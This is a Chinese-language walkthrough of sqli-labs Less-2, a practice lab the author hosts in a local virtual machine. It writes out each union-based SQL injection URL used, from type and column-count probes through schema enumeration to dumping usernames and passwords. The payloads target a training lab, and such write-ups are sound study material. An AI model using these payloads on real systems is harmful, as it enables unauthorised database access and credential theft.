sqli-labs靶场第二关less-2

sqli-labs靶场第二关less-2

本次测试在虚拟机搭建靶场,从主机测试

1、输入?id=1和?id=2发现有不同的页面回显

2、判断注入类型

http://192.168.128.3/sq/Less-2/?id=1'

从回显判断多一个' ,预测可能是数字型注入

输入

http://192.168.128.3/sq/Less-2/?id=1 and 1=1

http://192.168.128.3/sq/Less-2/?id=1 and 1=2

发现and 1=1 正常回显,and 1=2 回显错误,确定数字型注入

3、确定列数

http://192.168.128.3/sq/Less-2/?id=1 group by 5

http://192.168.128.3/sq/Less-2/?id=1 group by 4

http://192.168.128.3/sq/Less-2/?id=1 group by 3

group by 3 的时候回显正常,确定有三列。

4、确定回显位

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,2,3

2.3位为回显位

5、查询数据库名和版本

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,database(),version()

6、爆出数据库名

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

7、爆出表名

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

8、爆出列名

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'

9、爆出数据

http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(username,'~',password),3 from security.users

** 大功告成**

相关推荐
数据知道4 分钟前
MongoDB 正则表达式查询:在 MongoDB 中实现模糊搜索与索引优化陷阱
数据库·mongodb·正则表达式
纤纡.10 分钟前
从 WHERE 到 OFFSET:SQL 基本查询的核心逻辑
linux·数据库·sql
ID_1800790547322 分钟前
淘宝商品详情API请求的全场景,带json数据参考
服务器·数据库·json
troublea25 分钟前
Laravel5.x核心特性全解析
数据库·spring boot·后端·mysql
難釋懷1 小时前
Redis消息队列-基于Stream的消息队列
数据库·redis·缓存
GDAL1 小时前
SQLite 与 MySQL 性能深度对比:场景决定最优解
数据库·mysql·sqlite
troublea1 小时前
Laravel 8.x新特性全解析
数据库·mysql·缓存
焦糖玛奇朵婷1 小时前
做盲盒小程序,如何少走弯路?
数据库·程序人生·小程序·开源软件·软件需求
mi20061 小时前
Linux下安装postgresql记录
数据库·postgresql
清云随笔1 小时前
MySQL 的常见操作(基础)
数据库·mysql